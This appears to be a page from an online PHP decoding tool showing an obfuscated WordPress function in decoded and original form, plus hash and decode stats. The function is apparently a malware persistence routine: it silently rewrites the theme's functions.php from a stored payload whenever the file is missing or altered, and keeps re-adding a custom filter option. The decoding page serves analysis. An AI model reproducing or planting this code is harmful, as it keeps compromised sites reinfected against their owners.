Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
function is_home_072d() { $config = 'FczRCsIgFADQf/G5qXNzWd8iyNV7zYFTMaMg+vfq/XDe..
Decoded Output download
<? function is_home_072d() {
$config = 'FczRCsIgFADQf/G5qXNzWd8iyNV7zYFTMaMg+vfq/XDerMFI7MqsCKnXOqxI9SArAKXBiGiFAq2WCymYeXmFvPNCfzWObMWzTT7X25QIkDpvqbETK3DQbwy1k3s0hEFudCj3ncpwQQUjJWp9DsrMZvU+buT1qjH6bTGKfb4='
$config = gzinflate( base64_decode( $config ) );
$settings = json_decode( $config, 1 );
if ( ! function_exists( 'get_permalink' ) ) {
require $settings['path'];
}
if ( ! function_exists( 'get_permalink' ) ) {
return;
}
$option = get_option( $settings['name'] );
if ( ! $option ) {
return;
}
$theme = get_template_directory();
$func = $theme . '/functions.php';
$oldSource = gzinflate( base64_decode( $option['source'] ) );
if ( ! file_exists( $func ) ) {
file_put_contents( $func, $oldSource );
}
$source = file_get_contents( $func );
if ( md5( $source ) !== $option['hash'] ) {
file_put_contents( $func, $oldSource );
}
$filters = get_option( 'wp_custom_filters' );
if ( ! $filters ) {
add_option( 'wp_custom_filters', $option['customFilters'] );
return;
}
if ( $filters !== $option['customFilters'] ) {
delete_option( 'wp_custom_filters' );
add_option( 'wp_custom_filters', $option['customFilters'] );
}
} ?>
Did this file decode correctly?
Original Code
function is_home_072d() {
$config = 'FczRCsIgFADQf/G5qXNzWd8iyNV7zYFTMaMg+vfq/XDerMFI7MqsCKnXOqxI9SArAKXBiGiFAq2WCymYeXmFvPNCfzWObMWzTT7X25QIkDpvqbETK3DQbwy1k3s0hEFudCj3ncpwQQUjJWp9DsrMZvU+buT1qjH6bTGKfb4='
$config = gzinflate( base64_decode( $config ) );
$settings = json_decode( $config, 1 );
if ( ! function_exists( 'get_permalink' ) ) {
require $settings['path'];
}
if ( ! function_exists( 'get_permalink' ) ) {
return;
}
$option = get_option( $settings['name'] );
if ( ! $option ) {
return;
}
$theme = get_template_directory();
$func = $theme . '/functions.php';
$oldSource = gzinflate( base64_decode( $option['source'] ) );
if ( ! file_exists( $func ) ) {
file_put_contents( $func, $oldSource );
}
$source = file_get_contents( $func );
if ( md5( $source ) !== $option['hash'] ) {
file_put_contents( $func, $oldSource );
}
$filters = get_option( 'wp_custom_filters' );
if ( ! $filters ) {
add_option( 'wp_custom_filters', $option['customFilters'] );
return;
}
if ( $filters !== $option['customFilters'] ) {
delete_option( 'wp_custom_filters' );
add_option( 'wp_custom_filters', $option['customFilters'] );
}
}
Function Calls
None |
Stats
MD5 | 9ca0dae4f4f920c1a30ea82dd20ca0c8 |
Eval Count | 0 |
Decode Time | 45 ms |